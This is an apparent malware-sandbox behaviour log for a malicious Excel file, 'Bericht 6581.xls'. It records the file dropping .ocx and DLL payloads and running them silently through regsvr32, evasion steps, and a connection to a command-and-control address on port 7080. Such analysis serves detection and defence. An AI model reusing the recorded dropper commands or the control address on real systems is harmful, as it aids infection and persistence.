Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150DBC 8_2_02150DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214E7A4 8_2_0214E7A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021427A4 8_2_021427A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C5AC 8_2_0214C5AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EFAC 8_2_0214EFAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B1A8 8_2_0213B1A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02159DA8 8_2_02159DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021393AC 8_2_021393AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153DD4 8_2_02153DD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021507D0 8_2_021507D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021325D8 8_2_021325D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214ABD8 8_2_0214ABD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D9C4 8_2_0214D9C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132DC0 8_2_02132DC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213DFCC 8_2_0213DFCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213EFCC 8_2_0213EFCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021499F4 8_2_021499F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021331F0 8_2_021331F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021513FC 8_2_021513FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021493E0 8_2_021493E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213AFE4 8_2_0213AFE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B3E4 8_2_0213B3E4
Source: Bericht 6581.xls Metadefender: Detection: 34%
Source: Bericht 6581.xls ReversingLabs: Detection: 46%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5669.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/11@4/51
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Bericht 6581.xls OLE indicator, Workbook stream: true
Source: Bericht 6581.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A804 Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,CloseHandle, 8_2_0214A804
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800011AC LoadStringW,LoadStringW,FindResourceA,LoadResource,LockResource, 7_2_00000001800011AC
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Bericht 6581.xls Initial sample: OLE indicators vbamacros = False
Source: I7IggNeBzEXeF5[1].dll.0.dr Static PE information: section name: _RDATA
Source: soci4.ocx.0.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) Jump to dropped file

Boot Survival

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1296 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1780 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe API coverage: 5.5 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180042F88 FindFirstFileExW, 7_2_0000000180042F88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_0000000180043464
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW, 8_2_0214C9F0
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000000018001360C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180048198 GetProcessHeap, 7_2_0000000180048198
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180002F14 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_0000000180002F14

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 174.138.33.49 7080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C150
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C1D4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000000018004C2A4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018004C364
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000000018004C5B0
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046664
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_000000018004C708
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046788
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000000018004C7DC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_0000000180046810
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018004C908
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_00000001800475F0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180059100 cpuid 7_2_0000000180059100
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800032C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_00000001800032C0

Stealing of Sensitive Information

Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY